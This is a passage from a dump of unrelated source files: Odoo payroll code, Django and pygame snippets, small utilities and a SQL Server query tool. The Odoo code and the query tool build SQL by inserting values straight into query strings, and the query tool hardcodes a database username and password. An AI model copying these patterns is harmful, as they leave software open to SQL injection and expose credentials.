################################ 8========D\n\n\"\"\"\n\nmain()\n","sub_path":"codeSkeletonV0.py","file_name":"codeSkeletonV0.py","file_ext":"py","file_size_in_byte":32282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"93729437","text":"import datetime\nimport time\nfrom itertools import groupby\nfrom operator import itemgetter\n\nimport math\nfrom openerp import netsvc\nfrom openerp import tools\nfrom openerp.osv import fields, osv\nfrom openerp.tools.translate import _\nfrom openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP, float_compare\n\nclass hr_advance_payment(osv.osv):\n _name = \"hr.advance.payment\"\n \n def _get_user_department(self, cr, uid, ids, field_name, arg, context=None):\n employee_pool = self.pool.get('hr.employee')\n res = {}\n for attendance in self.browse(cr, uid, ids, context=context):\n res[attendance.id] = attendance.employee_id.department_id and attendance.employee_id.department_id.id or False\n return res\n \n _columns ={\n 'name':fields.char('Description',size=128), \n 'employee_id':fields.many2one('hr.employee','Employee',required=True, readonly=True, states={'draft': [('readonly', False)]}),\n 'date':fields.date('Date',required=True, readonly=True, states={'draft': [('readonly', False)]}),\n 'amount':fields.float('Amount', digits=(16,2), required=True, readonly=True, states={'draft': [('readonly', False)]}),\n 'currency_id': fields.many2one('res.currency', 'Currency', required=True, readonly=True, states={'draft': [('readonly', False)]}),\n 'exchange_rate':fields.float('Exchange Rate', digits=(16,2), required=True, readonly=True, states={'draft': [('readonly', False)]}),\n 'user_id': fields.many2one('res.users', 'Created by', required=True, readonly=True, states={'draft': [('readonly', False)]}),\n 'approved_by': fields.many2one('res.users', 'Approved by', readonly=True),\n \n 'department_id': fields.function(_get_user_department, type='many2one', relation='hr.department', string='Department',\n store={\n 'hr.advance.payment': (lambda self, cr, uid, ids, c={}: ids, ['employee_id'], 10),\n }, readonly=True),\n \n 'state': fields.selection([('draft','Draft'),('confirmed','Confirmed'),('cancel','Cancelled')], 'State', readonly=True)\n }\n \n def _get_currency(self, cr, uid, context=None):\n res_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.currency_id.id or False\n return res_id\n \n _defaults = {\n 'date': time.strftime(DEFAULT_SERVER_DATE_FORMAT),\n 'user_id': lambda obj, cr, uid, context: uid,\n 'currency_id': _get_currency,\n 'exchange_rate': 1.0,\n 'state': 'draft'\n }\n def _check_amount(self, cr, uid, ids,context=None):\n for payment in self.browse(cr, uid, ids, context=context):\n if payment.amount <= 0:\n return False\n return True\n _constraints = [\n (_check_amount,\"Amount must be greater than 0\",['amount']),\n ]\n \n def action_confirm(self, cr, uid, ids, context=None):\n payslip_pool = self.pool.get('hr.payslip')\n for line in self.browse(cr, uid, ids):\n cr.execute('''\n SELECT id, number, state\n FROM hr_payslip\n WHERE employee_id=%s AND date_to >= '%s' AND date_from <='%s' \n '''%(line.employee_id.id, line.date, line.date))\n res = cr.fetchall()\n for payslip in res:\n if payslip[2] == 'done':\n raise osv.except_osv(_('Warning!'),_(\"Payslip number '%s' has been paid!\\n You are not able to confirm this Payment!\")%(payslip[1]))\n# elif payslip[2] != 'cancel':\n# cr.execute('''\n# INSERT INTO 
hr_advance_payment_payslip_rel(payslip_id,payment_id) VALUES(%s,%s)\n# '''%(payslip[0],line.id))\n #Thanh: Recompute Related Payslip to update Advanced Amount\n self.write(cr, uid, [line.id], {'state':'confirmed','approved_by':uid})\n if res:\n payslip_pool.compute_sheet(cr, uid, [x[0] for x in res], context)\n return True\n \n def action_cancel(self, cr, uid, ids, context=None):\n payslip_pool = self.pool.get('hr.payslip')\n for line in self.browse(cr, uid, ids):\n cr.execute('''\n SELECT hp.id, hp.number, hp.state\n FROM hr_advance_payment_payslip_rel app join hr_payslip hp on app.payslip_id = hp.id\n WHERE app.payment_id = %s\n '''%(line.id))\n res = cr.fetchall()\n for payslip in res:\n if payslip[2] == 'done':\n raise osv.except_osv(_('Warning!'),_(\"Payslip number '%s' has been paid!\\n You are not able to cancel this Payment!\")%(res[0][0]))\n elif payslip[2] != 'cancel':\n cr.execute('''\n DELETE FROM hr_advance_payment_payslip_rel WHERE payment_id=%s\n '''%(line.id))\n #Thanh: Recompute Related Payslip to update Advanced Amount\n self.write(cr, uid, [line.id], {'state':'cancel'})\n if res:\n payslip_pool.compute_sheet(cr, uid, [x[0] for x in res], context)\n return True\n \n def set_to_draft(self, cr, uid, ids, context=None):\n self.write(cr, uid, ids, {'state':'draft','user_id':uid,'approved_by':False})\n return True\n \n def write(self, cr, uid, ids, vals, context=None):\n comp_currency_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.currency_id.id or False\n if vals.get('currency_id', False) and vals['currency_id'] == comp_currency_id:\n vals['exchange_rate'] = 1.0\n return super(hr_advance_payment, self).write(cr, uid, ids, vals, context)\n \n def create(self, cr, uid, vals, context=None):\n comp_currency_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.currency_id.id or False\n if vals.get('currency_id', False) and vals['currency_id'] == comp_currency_id:\n vals['exchange_rate'] = 1.0\n return super(hr_advance_payment, self).create(cr, uid, vals, context)\n \nhr_advance_payment()","sub_path":"general_l10n_vn_hr_payroll/hr_advance_payment.py","file_name":"hr_advance_payment.py","file_ext":"py","file_size_in_byte":6215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"614288710","text":"# Setter und Getter-Methode für self.note via property-Decorator\n\n\nclass Student:\n\n def __init__(self, matrnr):\n self.matrikelnummer = matrnr\n self.__note = 0\n\n @property\n def note(self):\n if self.__note > 0:\n return self.__note\n else:\n raise Exception('Noch nicht benotet.')\n\n @note.setter\n def note(self, note):\n if note >= 1 and note <= 5:\n self.__note = note\n else:\n raise ValueError('Note nicht im erlaubten Bereich!')\n\n\nif __name__ == '__main__':\n hans = Student('14012345')\n hans.note = 12 # change to 1 to see a working example\n print(hans.note)\n","sub_path":"examples/objekte/property-decorator.py","file_name":"property-decorator.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"181844694","text":"from django.conf.urls import url\nfrom . 
import views\n\napp_name = 'aplikacja'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^about_me/', views.about_me, name='about_me'),\n url(r'^contact/', views.contact, name='contact'),\n url(r'^publications/', views.publications, name='publications'),\n url(r'^for_students/', views.for_students, name='for_students'),\n]","sub_path":"aplikacja/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"91640767","text":"import ast, glob, os, re, subprocess \n\nclass MergeMetrics(object):\n '''\n Base Metrics Api implementation\n '''\n def __init__(self):\n self.solmetant = 'solmetant.csv' # solidity metrics antonio file\n self.etherscan_json = self._get_contracts_json()\n\n def _get_contracts_json(self):\n with open('contracts.json', 'r') as f:\n return [ast.literal_eval(line) for line in f]\n\n def get_sol_file_name(self, obj):\n src = os.path.join('./output', obj[\"address\"].replace(\"0x\", \"\")[:2].lower())\n src = \"/\".join([src, obj[\"address\"].replace(\"0x\", \"\")])\n return \"_\".join([src, obj[\"name\"]])\n \n def _write_file_header(self):\n self.outf = open(self.solmetant, 'w')\n self.outf.write('SolidityFile;ETHAddress;ContractName;Type;SLOC;LLOC;CLOC;NF;WMC;NL;NLE;NUMPAR;NOS;DIT;NOA;NOD;CBO;NA;NOI;Avg. McCC;Avg. NL;Avg. NLE;Avg. NUMPAR;Avg. NOS;Avg. NOI;FS;LS;CV;\\n')\n\n def join_etherscan_solmet(self):\n self._write_file_header()\n for obj in self.etherscan_json:\n try:\n fn = \".\".join([self.get_sol_file_name(obj), 'out'])\n lines = open(fn, 'r').readlines()\n except TypeError:\n continue\n try:\n self.outf.write(';'.join([\n lines[1].rstrip(),\n obj['firstseen'],\n obj['lastseen'],\n obj['compiler_version'], '\\n'\n ]))\n except IndexError:\n print(\"fn: \", fn)\n self.outf.close()\n\nif __name__ == \"__main__\":\n m = MergeMetrics()\n m.join_etherscan_solmet()\n #print(m.get_sol_file_name({'address': '0x79a64dbe0a25390fa40a2eb819b934ccc7a06f45', 'name': 'ALLDigitalToken', 'compiler': 'Solidity', 'compiler_version': '0.4.25', 'balance': 0, 'txcount': '1', 'firstse en': '2019-02-26T05:04:06.000Z', 'lastseen': '2019-02-26T05:04:06.000Z'}))\n","sub_path":"examples/join_metrics.py","file_name":"join_metrics.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"132747538","text":"# Definition for an interval.\n# class Interval:\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\nclass Solution:\n def merge(self, intervals):\n if not intervals or len(intervals) < 2:\n return intervals\n intervals.sort(key = lambda x: x.start)\n result = [intervals[0]]\n for x in intervals[1:]:\n current, prev = x, result[-1] # cannot use carry since we have to point to the end of the resulting array\n if current.start <= prev.end:\n prev.end = max(prev.end, current.end)\n else:\n result.append(current)\n return result\n","sub_path":"leetcode/Merge Intervals.py","file_name":"Merge Intervals.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"279928362","text":"# -*- coding: UTF-8 -*-\nimport os\nfrom setuptools import setup\n\nwith open(os.path.join(os.path.dirname(__file__), 'README.rst')) as readme:\n README = readme.read()\n\ninstall_requirements = 
[\n\t\"Django>=1.8\",\n\t\"argparse>=1.2.1\",\n\t\"requests>=2.6.0\",\n\t\"simplejson>=3.6.5\",\n\t\"jsonfield>=1.0.3\",\n\t\"wsgiref>=0.1.2\"\n]\n\nsetup(\n name='django-gerencianet',\n version='0.1.4',\n packages=['gerencianet'],\n include_package_data=True,\n license='BSD License', # example license\n description='Uma aplicação django para comunicar com o gateway de pagamento Gerencianet',\n long_description=README,\n url='https://github.com/sidneycarlos65/django-gerencianet',\n author='Sidney Machado',\n author_email='sidney.machado@starlinetecnologia.com.br',\n install_requires=install_requirements,\n classifiers=[\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License', # example license\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n ],\n)\n","sub_path":"pypi_install_script/django-gerencianet-0.1.4.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"211356413","text":"import os\nfrom databaseHelper import DBConnection\n\ndb_file = os.path.expanduser('~/Telenor/mecs.db')\nconnection = DBConnection(db_file)\n\ndef purge():\n drop_events = 'DROP TABLE IF EXISTS events;'\n\n connection.execute_statement(drop_events)\n\ndef setup():\n create_events = \"\"\"CREATE TABLE IF NOT EXISTS events (\n id integer PRIMARY KEY,\n time real,\n node text,\n event integer,\n level text);\"\"\"\n \n connection.execute_statement(create_events)\n\npurge()\nsetup()","sub_path":"consumers/databaseSetup.py","file_name":"databaseSetup.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"479828667","text":"\n\nfrom xai.brain.wordbase.verbs._sabotage import _SABOTAGE\n\n#calss header\nclass _SABOTAGING(_SABOTAGE, ):\n\tdef __init__(self,): \n\t\t_SABOTAGE.__init__(self)\n\t\tself.name = \"SABOTAGING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"sabotage\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_sabotaging.py","file_name":"_sabotaging.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"471100935","text":"#### For plotting from reawrd values stored in files\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nwindow_size=5\ny = np.loadtxt(\"episode_reward.txt\", unpack=True)\ny_new=[y_ for y_ in y if y_!=0]\n\nx=range(len(y_new))\nplt.figure(1)\nplt.plot(x,y_new)\nplt.title('Original Reward')\nplt.xlabel('episodes')\nplt.ylabel('reward per episeodes')\nplt.show()\n\ny_new_smooth=list()\nfor i in range(window_size,len(y_new)-window_size):\n\ty_new_smooth.append((y_new[i-1]+y_new[i-2]+y_new[i-3]+y_new[i-4]+y_new[i]+y_new[i+1]+y_new[i+2]+y_new[i+3]+y_new[i+4])/window_size)\n \nx_smooth=range(len(y_new_smooth))\nplt.figure(2)\nplt.plot(x_smooth,y_new_smooth)\nplt.title('Smoothened Reward')\nplt.xlabel('episodes')\nplt.ylabel('reward per episeodes')\nplt.show()\n\n","sub_path":"S2l/ECCV/Exp2_push3dof/Results/Exp2_0deg_1/plotter_episodes_smoothen.py","file_name":"plotter_episodes_smoothen.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"269761726","text":"def remove(file1, file2, n):\r\n myfile1 = open(file1, 
\"r\")\r\n myfile2 = open(file2, \"w\")\r\n for i in range(1, n+1):\r\n a = myfile1.readline()\r\n x = a.split()\r\n y = x[::]\r\n for i in x:\r\n if i in [\"a\", \"an\", \"the\"]:\r\n y.remove(i)\r\n index = index(i)\r\n y[index] = \" \"\r\n myfile2.writelines(y)\r\n myfile2.close()\r\n\r\n\r\n","sub_path":"Class 12/File_Handling/Text files/lab_act2.py","file_name":"lab_act2.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"91869051","text":"class Table():\n '''A class to represent a SQuEaL table'''\n def __init__(self, col_names=[], contents=[]):\n ''' (list of str, list of list of str)-> dict\n Set up a new dictionary with given column name(s) and content(s) of the\n column(s)\n REQ: len(col_names) == len(contents)\n REQ: len(contents[i]) == len(contents[j]) (i, j are different indeces)\n '''\n self.col_names = col_names\n self.contents = contents\n\n # initiate an empty dictionary\n dict = {}\n # initiate a variable for index\n index = 0\n\n # use elemental for loop to process each name of the column\n for name in col_names:\n # use if statement to check whether the contents list is empty\n # (empty list evaluates to False)\n if self.contents:\n # add the information to the dictionary in pair\n # (name as key, content as value)\n dict[name] = contents[index]\n # increment the index by 1\n index += 1\n else:\n # let the value be empty for all names (keys) when there are\n # no rows (when contents list is empty)\n dict[name] = []\n\n self.dict = dict\n\n def set_dict(self, new_dict):\n '''(Table, dict of {str: list of str}) -> NoneType\n\n Populate this table with the data in new_dict.\n The input dictionary must be of the form:\n column_name: list_of_values\n '''\n # the original dictionary is replaced by the new dictionary\n self.dict = new_dict\n\n # replace the column name list with an empty list\n self.col_names = []\n # use elemental for loop to append new column names to the list\n for name in new_dict:\n self.col_names.append(name)\n\n # replace the content list with an empty list\n self.contents = []\n # use elemental for loop to append new lists of content to the list\n for key in new_dict:\n self.contents.append(new_dict[key])\n\n def get_dict(self):\n '''(Table) -> dict of {str: list of str}\n\n Return the dictionary representation of this table. 
The dictionary keys\n will be the column names, and the list will contain the values\n for that column.\n '''\n return self.dict\n\n def num_rows(self):\n ''' (Table) -> int\n return the number of rows of the table\n '''\n # use if statement to check whether the list of contents is empty\n if 0 < len(self.contents):\n # use the fact that every column has the same number of rows\n num_row = len(self.contents[0])\n\n else:\n # assign number of rows to 0 as the column has no rows\n num_row = 0\n\n return num_row\n\n def print_csv(self):\n '''(Table) -> NoneTypea\n Print a representation of table in csv format.\n '''\n # no need to edit this one, but you may find it useful (you're welcome)\n dict_rep = self.get_dict()\n columns = list(dict_rep.keys())\n print(','.join(columns))\n rows = self.num_rows()\n for i in range(rows):\n cur_column = []\n for column in columns:\n cur_column.append(dict_rep[column][i])\n print(','.join(cur_column))\n\n\nclass Database():\n '''A class to represent a SQuEaL database'''\n def __init__(self, table_names=[], tables=[]):\n ''' (Database, list of str, list of Table) -> NoneType\n Set up a database with given table name(s) and table(s)\n REQ: len(table_names) == len(tables)\n '''\n self.table_names = table_names\n self.tables = tables\n\n # initiate an empty dictionary\n dict = {}\n # initiate a variable for index\n index = 0\n # use elemental for loop to process each name of the table\n for name in table_names:\n # add the information to the dictionary in pair\n dict[name] = tables[index]\n # increment the index by 1\n index += 1\n\n self.dict = dict\n\n def set_dict(self, new_dict):\n '''(Database, dict of {str: Table}) -> NoneType\n\n Populate this database with the data in new_dict.\n new_dict must have the format:\n table_name: table\n '''\n # the original dictionary is replaced by the new dictionary\n self.dict = new_dict\n\n # replace the table name list with an empty list\n self.table_names = []\n # use elemental for loop to append new table names to the list\n for name in new_dict:\n self.table_names.append(name)\n\n # replace the table list with an empty list\n self.tables = []\n # use elemental for loop to append new lists of table to the list\n for key in new_dict:\n self.tables.append(new_dict[key])\n\n def get_dict(self):\n '''(Database) -> dict of {str: Table}\n\n Return the dictionary representation of this database.\n The database keys will be the name of the table, and the value\n will be the table itself.\n '''\n return self.dict\n","sub_path":"assignment_3/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":5211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"567899134","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nimport os\n\nDATABASE_URL = os.getenv(\"DATABASE_URL\", \"Database url undefined\").replace('postgres', 'postgresql')\n\nengine = create_engine(DATABASE_URL)\nSessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n\nBase = declarative_base()\n\n\nasync def get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n","sub_path":"backend/app/core/models/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"567261658","text":"#!/usr/bin/env python\n\nimport argparse\nimport pyodbc\nimport 
re\nfrom datetime import datetime\n# import xwutils\n\ncs = \"DRIVER={SQL Server};SERVER=HIIWINBL18;UID=SNUser;PWD=BestNest1445;\"\n# sndb_conn = pyodbc.connect(cs + 'DATABASE=ReallyOldArchives')\nsndb_conn = pyodbc.connect(cs + 'DATABASE=SNDBase91')\noys_conn = pyodbc.connect(cs + 'DATABASE=OYSProgramUpdate')\nsndb = sndb_conn.cursor()\noys = oys_conn.cursor()\n\nsheet = re.compile(r'[A-Z]+[0-9]+')\npart = re.compile(r'[0-9]+[A-Z][-|_][A-Z][0-9]+[A-Z]+')\nprog = re.compile(r'[0-9]+$')\nmm = re.compile(r'[0-9]+[A-Z][-][0-9]+')\n\nlast_program = None\n\n# [regexpr, Table, Columns to display, Column to constrain by values]\nqueues = [[sheet, 'Stock', 'SheetName, PrimeCode', 'SheetName'],\n [sheet, 'StockHistory', 'SheetName, ProgramName', 'SheetName'],\n [part, 'Part', 'PartName, WONumber', 'PartName'],\n [part, 'PIP', 'PartName, ProgramName, WONumber', 'PartName'],\n [prog, 'PIP', 'ProgramName, PartName', 'ProgramName'],\n [part, 'PIPArchive', 'PartName, ProgramName, WONumber, ArcDateTime',\n 'TransType=\\'SN102\\' AND PartName'],\n [prog, 'PIPArchive', 'ProgramName, PartName, ArcDateTime',\n 'TransType=\\'SN102\\' AND ProgramName'],\n [mm, 'StockArchive', 'PrimeCode, HeatNumber, ProgramName, ArcDateTime',\n 'PrimeCode'],\n [sheet, 'Program', 'SheetName, ProgramName', 'SheetName'],\n [sheet, 'ProgArchive', 'SheetName, ProgramName, CompDate',\n 'TransType=\\'SN102\\' AND SheetName'],\n [prog, 'StockHistory', 'SheetName, HeatNumber, BinNumber', 'ProgramName']]\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('program', nargs='?', default='',\n help='script args: Q, P, UH, US or program name')\n\n args = parser.parse_args()\n arg = args.program.upper()\n\n opts = [['Query SigmaNEST Database', 'Q', query, 'Value: '],\n ['Check Program Status', 'P', get_updated, '\\nProgram :: '],\n ['Update Program Heat Number', 'UH', update_heat, '\\nProgram: '],\n ['Update Sheet Size', 'US', update_size, '\\nSheet Name: ']]\n\n if arg:\n for x in opts:\n if x[1] == arg:\n script, val_str = x[2:]\n break\n else:\n print(get_updated(args.program))\n exit()\n else:\n print('Available Archive Scripts:')\n indexed = enumerate([x[0] for x in opts], start=1)\n print(''.join(['\\n %s::%s' % (i, v) for i, v in indexed]))\n index = int(input('\\nScript to run: '))\n if index > len(opts):\n print('Index out of range')\n exit()\n script, val_str = opts[index - 1][2:]\n\n print('\\n\\n')\n while 1:\n val = input(val_str).upper()\n if not val:\n break\n ret = script(val)\n if ret:\n print(ret + '\\n')\n\n\n sndb_conn.close()\n oys_conn.close()\n\n\n# arg :: Q\ndef query(values):\n q = f\"%%{values.replace('-', '%').replace(' ', '%')}%%\"\n for x in queues:\n cs = f\"SELECT {x[2]} FROM {x[1]} WHERE {x[3]} LIKE '{q}'\"\n sndb.execute(cs)\n ls = []\n for a in sndb.fetchall():\n ls.append(list(a))\n for index, item in enumerate(a):\n if type(item) is datetime:\n item = datetime.strftime(item, '%m/%d/%Y %H:%M')\n ls[-1][index] = item\n if ls:\n lens = [len(max([t[i] for t in ls])) for i, x in enumerate(ls[0])]\n outls = [[x.ljust(lens[i]) for i, x in enumerate(a)] for a in ls]\n\n print(cs)\n for x in outls:\n print(' :: '.join(x))\n print('\\n')\n\n return None\n\n\n# arg :: P\ndef get_updated(prog):\n global last_program\n if last_program and len(prog) < 5:\n stop = 5 - len(prog)\n prog = f'{last_program[:stop]}{prog}'\n print(f'\\x1b[1A\\x1b[2KProgram :: {prog}')\n # up 5, del 1, dn 1, del 1, line return\n print('\\x1b[5A\\x1b[1M\\x1b[1B\\x1b[1M')\n line = f'\\x1b[{len(prog) + 11}C'\n last_program 
= prog\n\n sndb.execute('SELECT SheetName FROM Program WHERE ProgramName=?', prog)\n temp = sndb.fetchall()\n if temp:\n return line + ' is active'\n\n sndb.execute(\"\"\"SELECT ArcDateTime, TransType FROM ProgArchive WHERE\n ProgramName=?\"\"\", prog)\n temp = sndb.fetchall()\n if not temp:\n return line + ' not found'\n last = max(temp, key=lambda x: x[0])\n if last[1] == 'SN101':\n return line + ' was deleted'\n data = [datetime.strftime(last[0], '%m/%d/%Y %H:%M')]\n oys.execute(\"\"\"SELECT OperatorName FROM CompletedProgram\n WHERE ProgramName=?\"\"\", prog)\n data.append((oys.fetchone() or ('N/A', ''))[0])\n sndb.execute(\"\"\"SELECT HeatNumber, BinNumber, SheetName\n FROM StockHistory WHERE ProgramName=?\"\"\", prog)\n data.extend(list(sndb.fetchone()))\n\n return line + ' was updated ' + ' :: '.join(data)\n\n\n# arg :: UH >> update heat number, PO number and SAP MM if given\ndef update_heat(prog, heat=None, po=None, mm=None):\n sndb.execute(\"\"\"SELECT HeatNumber, BinNumber, PrimeCode\n FROM StockHistory WHERE ProgramName=?\"\"\", prog)\n orig_heat, orig_po, orig_mm = sndb.fetchone()\n heat = heat or input('Heat Number: ').upper() or orig_heat\n po = po or input('PO Number: ').upper() or orig_po\n mm = mm or input('SAP MM: ').upper() or orig_mm\n\n val = input(f'Heat :: {heat}\\nPO :: {po}\\nSAP MM :: {mm}\\n\\nCommit? ')\n if not val or val.upper()[0] != 'Y':\n return None\n\n # update heat, po and sap mm\n sndb.execute(\"\"\"UPDATE StockHistory\n SET HeatNumber=?, BinNumber=?, PrimeCode=?\n WHERE ProgramName=?\"\"\", (heat, po, mm, prog))\n sndb.execute(\"\"\"UPDATE StockArchive\n SET HeatNumber=?, BinNumber=?, PrimeCode=?\n WHERE ProgramName=?\"\"\", (heat, po, mm, prog))\n sndb_conn.commit()\n\n return None\n\n\n# arg :: US >> update sheet size\ndef update_size(sheet, wid=None, len=None):\n sndb.execute('SELECT Width, Length FROM Stock WHERE SheetName=?', sheet)\n db_wid, db_len = sndb.fetchone()\n wid = wid or input('Width: ').strip() or db_wid\n len = len or input('Length: ').strip() or db_len\n area = float(len) * float(wid)\n\n sndb.execute('''\n UPDATE Stock\n SET Width=?, Length=?, Area=?\n WHERE SheetName=?\n ''', (wid, len, area, sheet))\n sndb_conn.commit()\n\n return None\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"prog.py","file_name":"prog.py","file_ext":"py","file_size_in_byte":6547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"269626767","text":"import pygame\nimport time\nimport constants\nimport spaceship\nimport enemybullet\nimport math\n\n\nclass Enemytype3(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self)\n self.width = constants.enemytype3width\n self.height = constants.enemytype3height\n self.rect = pygame.Rect(0, 0, self.width, self.height)\n self.rect.x = x\n self.rect.y = y\n self.image = pygame.image.load(\"dopeenemy3.png\")\n self.image = pygame.transform.scale(self.image, (self.width, self.height))\n self.speedx = constants.enemytype3speed\n self.speedy = constants.enemytype3speed\n self.timer = time.time()\n self.bullettime = constants.enemytype3bullettimer\n self.health = 1\n\n def update(self, player, ebullets, enemies):\n self.rect.x += self.speedx\n if self.speedx > 3:\n self.speedx -= 1\n self.rect.y += self.speedy\n if self.speedy > 2:\n self.speedy -= 1\n if self.speedx < 0 and self.rect.x + self.width < 0:\n enemies.remove(self)\n if self.speedx > 0 and self.rect.x > constants.size[0]:\n enemies.remove(self)\n\n distance = 
math.sqrt((self.rect.x - player.rect.x)**2 + (self.rect.y - player.rect.y)**2)\n xspeed = constants.enemy1bulletspeed * math.fabs(self.rect.x - player.rect.x)/distance\n yspeed = constants.enemy1bulletspeed * math.fabs(self.rect.y - player.rect.y)/distance\n\n if time.time() - self.timer + 0.0 > constants.enemytype3bullettimer:\n bullet = enemybullet.Enemybullet(self.rect.x + self.width/2 - constants.ebulletwidth/2,\n self.rect.y + self.height, xspeed, yspeed)\n ebullets.add(bullet)\n self.timer = time.time()","sub_path":"Space/enemytype3.py","file_name":"enemytype3.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"563551588","text":"# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\nimport sys,os,select\nimport serial\nimport time\nser = serial.Serial(sys.argv[1],int(sys.argv[2]))\n\nlast_print=time.time()\n#pad=b'\\x00\\xff'*2\npad=b'\\x00\\xff\\x00\\xff'\n\ndata_len=0\npad_len=0\ntic=time.time()\nwhile 1:\n if sys.argv[3]=='out':\n bs=128\n reader=sys.stdin.buffer\n if len(select.select([sys.stdin],[],[],0)[0])>0:\n data=reader.read(bs)\n ser.write(data)\n data_len+=len(data)\n while ser.out_waiting==0 and 1:\n pad_chunk=pad*1\n ser.write(pad_chunk)\n pad_len+=len(pad_chunk)\n else:\n bs=1\n writer=sys.stdout.buffer\n data=ser.read(bs)\n for i in range(len(pad)):\n if data[-1]==pad[i] and len(data)3:\n to_rate=1.0/3.0/1e3*8\n print('data sent rate: {:5.1f}Kbit/s pad: {:5.1f} total: {:5.1f} '\\\n .format(data_len*to_rate, pad_len*to_rate, (pad_len+data_len)*to_rate),file=sys.stderr)\n tic=time.time()\n data_len=0\n pad_len=0\n\n","sub_path":"stdpipe2.py","file_name":"stdpipe2.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"536185892","text":"from green import *\nfrom dipole import *\nfrom metalens import *\nimport numpy as np\nfrom scipy.special import jv, hankel1\n\npi = np.pi\n\nEPS = 1\n# lambda_ = 826.60\nlambda_ = 620\nr_sph = 100\n\neps1 = 1\neps2 = 1\nk1 = 2 * pi * eps1 ** (1 / 2) / lambda_\nk2 = 2 * pi * eps2 ** (1 / 2) / lambda_\nk0 = 2 * pi / lambda_\n\ntheta_inc = 0\nW_0 = 300000\n\n# polarization vector\nE_in = np.array((np.cos(theta_inc), 0, -np.sin(theta_inc)))\nH_in = np.array((0, 1, 0))\n# wave vector\nw = np.array((k0 * eps1 ** (1 / 2) * np.sin(theta_inc), 0, k0 * eps1 ** (1 / 2) * np.cos(theta_inc)))\n\n\ndef get_alphas(lambda_, r_sph):\n x = 2 * pi * r_sph / lambda_\n kk = 2 * pi / lambda_\n eps = 15.254 + 1j * 0.172\n m = eps ** (1 / 2)\n n = 1\n\n psi_n = (pi * x / 2) ** (1 / 2) * jv(n + 1 / 2, x)\n psi_n_dir = (1 / 2) * (pi / (2 * x)) ** (1 / 2) * jv(n + 1 / 2, x) + (pi * x / 2) ** (1 / 2) * (\n jv(n - 1 / 2, x) - ((n + 1 / 2) / x) * jv(n + 1 / 2, x))\n psi_n_m = (pi * m * x / 2) ** (1 / 2) * jv(n + 1 / 2, m * x)\n psi_n_dir_m = (1 / 2) * (pi / (2 * m * x)) ** (1 / 2) * jv(n + 1 / 2, m * x) + (pi * m * x / 2) ** (1 / 2) * (\n jv(n - 1 / 2, m * x) - ((n + 1 / 2) / (m * x)) * jv(n + 1 / 2, m * x))\n xci_n = (pi * x / 2) ** (1 / 2) * hankel1(n + 1 / 2, x)\n xci_n_dir = (1 / 2) * (pi / (2 * x)) ** (1 / 2) * hankel1(n + 1 / 2, x) + (pi * x / 2) ** (1 / 2) * (\n hankel1(n - 1 / 2, x) - ((n + 1 / 2) / x) * hankel1(n + 1 / 2, x))\n\n a_n = (psi_n * psi_n_dir_m - m * psi_n_m * psi_n_dir) / (xci_n * psi_n_dir_m - m * psi_n_m * xci_n_dir)\n b_n = (m * psi_n * psi_n_dir_m - psi_n_m * psi_n_dir) / (m * xci_n * psi_n_dir_m - psi_n_m * xci_n_dir)\n\n alpha_e = 1j * pi * 6 * a_n 
